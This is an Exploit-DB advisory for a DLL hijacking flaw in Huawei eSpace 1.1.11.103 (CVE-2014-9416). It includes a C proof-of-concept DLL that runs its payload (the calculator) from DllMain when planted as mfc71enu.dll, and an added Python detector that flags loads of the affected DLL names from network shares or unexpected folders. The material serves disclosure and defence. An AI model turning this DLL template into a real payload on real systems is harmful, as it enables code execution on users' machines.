Huawei eSpace 1.1.11.103 – DLL Hijacking

  • Author: LiquidWorm
    Date: 2019-05-20
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46866/
  • /*
    
    Huawei eSpace Desktop DLL Hijacking Vulnerability
    
    
    Vendor: Huawei Technologies Co., Ltd.
    Product web page: https://www.huawei.com
    Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
    
    Summary: Create more convenient Enhanced Communications (EC) services for your
    enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
    voice, data, video, and service streams, and provides users with easy and secure
    access to their service platform from any device, in any place, at any time. The
    eSpace Meeting allows you to join meetings that support voice, data, and video
    functions using the PC client, the tablet client, or an IP phone, or in a meeting
    room with an MT deployed.
    
    Desc: eSpace suffers from a DLL hijacking issue. The vulnerability is caused by
    the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and
    airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries
    by tricking a user into opening a related application file (.html, .jpg, .png)
    located on a remote WebDAV or SMB share.
    
    Tested on: Microsoft Windows 7 Professional
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    
    19.08.2014
    
    Patched version: V200R003C00
    Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154
    CVE ID: CVE-2014-9416
    Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
    
    */
    
    
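    // gcc -shared -o mfc71enu.dll exploit.c
    
    #include <windows.h>
    
    // Forward declaration: exec() is defined after DllMain.
    int exec(void);
    
    // Entry point the loader calls when the DLL is mapped into the process.
    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
    {
    	exec();
    	// Returns FALSE, so the loader reports the load as failed.
    	return 0;
    }
    
    // Proof-of-concept payload: starts the Windows calculator.
    int exec(void)
    {
    	WinExec("calc.exe" , SW_NORMAL);
    	return 0;
    }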
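
Detection-side example, added here and not part of the original advisory or PoC: it triages image-load telemetry for the four DLL names listed in the description and flags loads that come from an SMB/WebDAV (UNC) path or from a directory other than the loading process's own folder or the Windows directory. The `Image` and `ImageLoaded` keys follow Sysmon Event ID 7 field names; the application path, share names and events are constructed samples, and the trusted Windows root is an assumption.

```python
import ntpath

# DLL names listed in the advisory description above.
WATCHED = {"mfc71enu.dll", "mfc71loc.dll", "tcapi.dll", "airpcap.dll"}
# Assumption: default Windows install root; adjust for the monitored hosts.
TRUSTED_ROOTS = ("c:\\windows\\",)


def classify(event):
    """Return a finding label for a suspicious load of a watched DLL, else None."""
    loaded = event["ImageLoaded"]
    if ntpath.basename(loaded).lower() not in WATCHED:
        return None
    # UNC paths are how SMB and WebDAV shares appear in the loaded-image path.
    if loaded.startswith("\\\\"):
        return "remote-share"
    loaded_dir = ntpath.dirname(loaded).lower()
    app_dir = ntpath.dirname(event["Image"]).lower()
    # Loads from the application's own folder or the Windows tree are expected.
    if loaded_dir == app_dir or (loaded_dir + "\\").startswith(TRUSTED_ROOTS):
        return None
    return "unexpected-directory"


def flag_loads(events):
    """Return (loaded path, finding) pairs for every event that classify() flags."""
    return [(e["ImageLoaded"], c) for e in events if (c := classify(e))]


# Constructed sample events (hypothetical application path, not real captures).
APP = r"C:\Program Files\ExampleApp\app.exe"
SAMPLE = [{"Image": APP, "ImageLoaded": p} for p in (
    r"C:\Windows\System32\kernel32.dll",             # not a watched name
    r"C:\Program Files\ExampleApp\tcapi.dll",        # application folder
    r"\\fileserver\share\docs\mfc71enu.dll",         # SMB share
    r"\\fileserver@SSL\DavWWWRoot\docs\airpcap.dll",  # WebDAV share
    r"C:\Users\alice\Downloads\MFC71LOC.DLL",        # document folder
)]

if __name__ == "__main__":
    for path, reason in flag_loads(SAMPLE):
        print(f"{reason}: {path}")
```

A mapped network drive letter is reported as `unexpected-directory` rather than `remote-share`, because the drive mapping hides the UNC prefix.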